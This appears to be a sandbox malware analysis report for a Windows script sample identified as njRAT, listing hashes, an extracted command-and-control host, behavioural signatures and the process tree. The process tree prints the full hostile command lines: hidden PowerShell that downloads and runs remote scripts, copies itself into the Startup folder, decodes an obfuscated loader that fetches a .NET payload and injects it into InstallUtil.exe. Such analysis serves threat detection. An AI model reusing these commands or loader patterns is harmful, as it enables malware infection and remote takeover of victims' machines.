Analysis
- max time kernel: 91s
- max time network: 100s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 06/10/2022, 17:04
Static task: static1
Behavioral task: behavioral1
- Sample: 1f9af4f8289740daa05ccfead19a29a9.wsf
- Resource: win7-20220812-en
General
- Target: 1f9af4f8289740daa05ccfead19a29a9.wsf
- Size: 53KB
- MD5: 1f9af4f8289740daa05ccfead19a29a9
- SHA1: 4c8703ecd5c150015f0e49243119ad26d672fe06
- SHA256: 86f4317f0c4ae86c9a37a380a1bcd18a0bef3077a808b93110cd774697c66439
- SHA512: 59acad54bf9274550bfa345b00bd7015bee7dec231fb562490aa2459383698a59b4d4658af575fea78300adaf0f580de04227c2a749f87f8daf37e63bf1ce124
- SSDEEP: 192:L48w8Nlb0bqGW6CCCuqpSS48w8Nlb0bqGW6CCCuqpd48w8Nlb0bqGW6CCCuqpJ:dwSb0cJqUwSb0cJzwSb0cJR
Malware Config
Extracted
- https://tinyurl.com/2erph6cs
Extracted
- Family: njrat
- Version: 0.7NC
- Botnet: NYAN CAT
- C2: wins0310ok.duckdns.org:8000
- Mutex: 2a624df8c6c4469
- reg_key: 2a624df8c6c4469
- splitter: @!#&^%$
Signatures
Blocklisted process makes network request (3 IoCs)
- flow 6, PID 1368, powershell.exe
- flow 14, PID 4792, powershell.exe
- flow 15, PID 4792, powershell.exe
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
- Key value queried: \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation (WScript.exe)
- Key value queried: \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation (WScript.exe)
Drops startup file (2 IoCs)
- File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ایسش.vbs (powershell.exe)
- File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ایسش.vbs (powershell.exe)
Suspicious use of SetThreadContext (1 IoC)
- PID 4792 (powershell.exe) set thread context of 1148, procid_target 92
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Modifies registry class (1 IoC)
- Key created: \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings (explorer.exe)
Suspicious behavior: EnumeratesProcesses (6 IoCs)
- PID 1368, powershell.exe (x2)
- PID 1612, powershell.exe (x2)
- PID 4792, powershell.exe (x2)
Suspicious use of AdjustPrivilegeToken (14 IoCs)
- Token: SeDebugPrivilege, PID 1368, powershell.exe
- Token: SeDebugPrivilege, PID 1612, powershell.exe
- Token: SeDebugPrivilege, PID 4792, powershell.exe
- Token: SeDebugPrivilege, PID 1148, InstallUtil.exe
- Token: 33, PID 1148, InstallUtil.exe (x5)
- Token: SeIncBasePriorityPrivilege, PID 1148, InstallUtil.exe (x5)
Suspicious use of WriteProcessMemory (21 IoCs)
- PID 2492 (WScript.exe) wrote to memory of 1368, procid_target 81 (x2)
- PID 1368 (powershell.exe) wrote to memory of 3532, procid_target 83 (x2)
- PID 4060 (explorer.exe) wrote to memory of 2072, procid_target 85 (x2)
- PID 2072 (WScript.exe) wrote to memory of 1612, procid_target 86 (x2)
- PID 1612 (powershell.exe) wrote to memory of 4792, procid_target 88 (x2)
- PID 4792 (powershell.exe) wrote to memory of 1148, procid_target 92 (x8)
- PID 1148 (InstallUtil.exe) wrote to memory of 580, procid_target 98 (x3)
Processes
- C:\Windows\System32\WScript.exe (PID 2492)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1f9af4f8289740daa05ccfead19a29a9.wsf"
  Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1368)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden wget 'https://cdn.discordapp.com/attachments/1026576632913342517/1027267777003802644/008.vbs' -o C:\Windows\Temp\nLeNPdi.vbs;explorer.exe C:\Windows\Temp\nLeNPdi.vbs;Start-Sleep 3;[System.IO.File]::Copy('ایسش.wsf','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ایسش.wsf');Start-Sleep 1;rm *.pif,*.uue
    Signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\explorer.exe (PID 3532)
      Command line: "C:\Windows\explorer.exe" C:\Windows\Temp\nLeNPdi.vbs
- C:\Windows\explorer.exe (PID 4060)
  Command line: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
  Signatures: Modifies registry class; Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WScript.exe (PID 2072)
    Command line: "C:\Windows\System32\WScript.exe" "C:\Windows\Temp\nLeNPdi.vbs"
    Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1612)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwCsAK8A+gDwAOQAugDXAOQAJwA7AFsAQgB5AHQAZQBbAF0AXQAgACQARABMAEwAIAA9ACAAWwBzAHkAcwB0AG⌚⌚⌚AbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHQAaQBuAHkAdQByAGwALgBjAG8AbQAvADIAZQByAHAAaAA2AGMAcwAnACkAKQA7AFsAcwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAH⌚⌚⌚AcgByAG⌚⌚⌚AbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQARABMAEwAKQAuAEcAZQB0AFQAeQBwAG⌚⌚⌚AKAAnAE4AdwBnAG8AeABNAC4ASwBQAEoAYQBOAGoAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFAAVQBsAEcASwBBACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH⌚⌚⌚AbABsACwAIABbAG8AYgBqAG⌚⌚⌚AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AMAAwADAAOAB0AGMAbwAzADAALwA2ADEANgAzADIANAAxADAAOQA5ADEANAA2ADcANQA2ADIAMAAxAC8AMgAzADQANgA2ADAAMQA5ADQAOAA3ADYANQA3AD⌚⌚⌚ANgAyADAAMQAvAHMAdABuAG⌚⌚⌚AbQBoAGMAYQB0AHQAYQAvAG0AbwBjAC4AcABwAGEAZAByAG8AYwBzAGkAZAAuAG4AZABjAC8ALwA6AHMAcAB0AHQAaAAnACAALAAgACQA⌚⌚⌚gBvAGQAYQBDAG8AcAB5ACAALAAgACcAJwbMBjMGNAYnACAAKQApAA==';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('⌚⌚⌚','U') ) );$OWjuxD = $OWjuxD.replace('¬¯úðäº×ä', 'C:\Windows\Temp\nLeNPdi.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4792)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Windows\Temp\nLeNPdi.vbs';[Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://tinyurl.com/2erph6cs'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('NwgoxM.KPJaNj').GetMethod('PUlGKA').Invoke($null, [object[]] ('txt.0008tco30/6163241099146756201/2346601948765756201/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $RodaCopy , 'ایسش' ))"
        Signatures: Blocklisted process makes network request; Drops startup file; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
        - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe (PID 1148)
          Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
          Signatures: Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
          - C:\Windows\SysWOW64\cmd.exe (PID 580)
            Command line: cmd.exe /C Y /N /D Y /T 1 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Downloads